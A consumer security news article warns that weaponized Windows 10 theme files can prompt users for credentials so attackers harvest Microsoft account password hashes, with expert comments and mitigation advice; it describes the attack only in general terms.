Windows 10 users have become so exposed to articles warning of security issues that there’s a danger of response sedation. Within the space of just a few short weeks, I have written about the potential for Microsoft Defender Antivirus becoming a security risk itself, a Windows 10 exploit that was left unpatched by Microsoft for two years, and an authentication vulnerability fix that failed to do the job intended. But, like London buses that come in bunches, here’s another warning that I suggest you take seriously: Windows 10 custom themes can be used to steal your Windows account password.
Get started on your cybersecurity degree at American Military University.
Malicious Windows 10 themes are a thing now
As picked up by the ever-vigilant Bleeping Computer, a security researcher has revealed how Windows 10 custom themes, and theme packs, can be used to steal Windows account passwords. The researcher, Jimmy Bayne, took to Twitter and explained how a Windows 10 wallpaper key could be maliciously configured as part of a pass-the-hash attack to harvest user credentials. All it takes is for the user to activate the weaponized theme file, which could be shared by way of an email attachment or, more likely, a link, and then a Windows credential prompt will be displayed.
This kind of attack relies upon two things: a user who really loves to switch around and experiment with Windows 10 themes, and that the user will also be using a Microsoft account rather than a local one. Truth be told, if you are a fan of Windows customization, then the chances are pretty good that you might also be into sharing themes you’ve created or using ones that others have. These themes are saved as .themes files and can be shared simply by a right-click “Save theme for sharing” option to pack them up as a new .deskthemepack file. These can then be shared online or by email.
Pass the hash
Pass-the-hash isn’t as much fun as it might initially sound. It involves a Windows user being tricked into accessing a remote resource that requires authentication. A resource like the maliciously-crafted shared theme which pops up a credential prompt enabling the attacker to harvest the hash and, potentially, from this discover the login and password to the Microsoft account. Bleeping Computer confirmed that it was able to extract a simple password in around four seconds.
The researcher tweeted that he had reported the exploit to the Microsoft security center earlier in the year, but was told it was a “feature by design” and would not be patched. I have reached out to Microsoft for comment and will update this article in due course once I have any official statement.
Think twice before installing custom Windows 10 themes
“These gimmicky themes are clearly not created with security in mind, and at the risk of exposing passwords and other sensitive data, I would suggest users think twice when installing them,” Jake Moore, a cybersecurity specialist at ESET, says.
“With more users forced to move away from local Microsoft accounts,” Moore warns, “this comes with the added risk of remote attacks and the potential of attacking further services such as email. It is vital to use two-factor authentication for as many services that offer it.”
Re-associating any .theme, .themepack or .desktopthemepackfile extensions is mitigation suggested by Jimmy Bayne, but be warned that this would prevent you from switching to any new theme. My advice? Don’t be tempted by the lure of a pretty desktop. Pick one you like and stick with it, avoid switching around, and don’t be clicking links that you aren’t 101% sure are safe.